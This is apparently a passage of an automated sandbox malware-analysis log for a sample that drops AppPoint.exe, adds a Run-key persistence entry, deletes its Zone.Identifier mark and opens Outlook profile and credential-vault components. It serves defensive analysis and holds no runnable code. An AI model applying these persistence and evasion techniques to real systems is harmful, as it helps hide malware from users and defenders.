Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Section loaded: windowscodecs.dll

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: IUqsn1SBGy.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: IUqsn1SBGy.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_0A5638BC push 69C84589h; ret	0_2_0A5638CC
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_0A5634F6 push 69CC4589h; ret	0_2_0A5634FC
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_0A5634A4 push 69CC4589h; ret	0_2_0A5634AF
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_0A563D2D push 69C84589h; ret	0_2_0A563D33
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 0_2_0A563DC5 push 69C84589h; ret	0_2_0A563DCB
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Code function: 5_2_066F2AF3 push ss; ret	5_2_066F2AF7
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 8_2_08F539F6 push 69C04589h; ret	8_2_08F539FB
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 10_2_0652FBD8 push eax; ret	10_2_0652FBE1
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 11_2_097F39F6 push 69C04589h; ret	11_2_097F39FB
Source: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe	Code function: 12_2_0675FBD8 push eax; ret	12_2_0675FBE1

Source: IUqsn1SBGy.exe	Static PE information: section name: .text entropy: 7.590852977086481
Source: AppPoint.exe.5.dr	Static PE information: section name: .text entropy: 7.590852977086481

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe

File created: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

Jump to dropped file

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppPoint			Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AppPoint			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe

File opened: C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe:Zone.Identifier read attributes | delete

Jump to behavior

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IUqsn1SBGy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
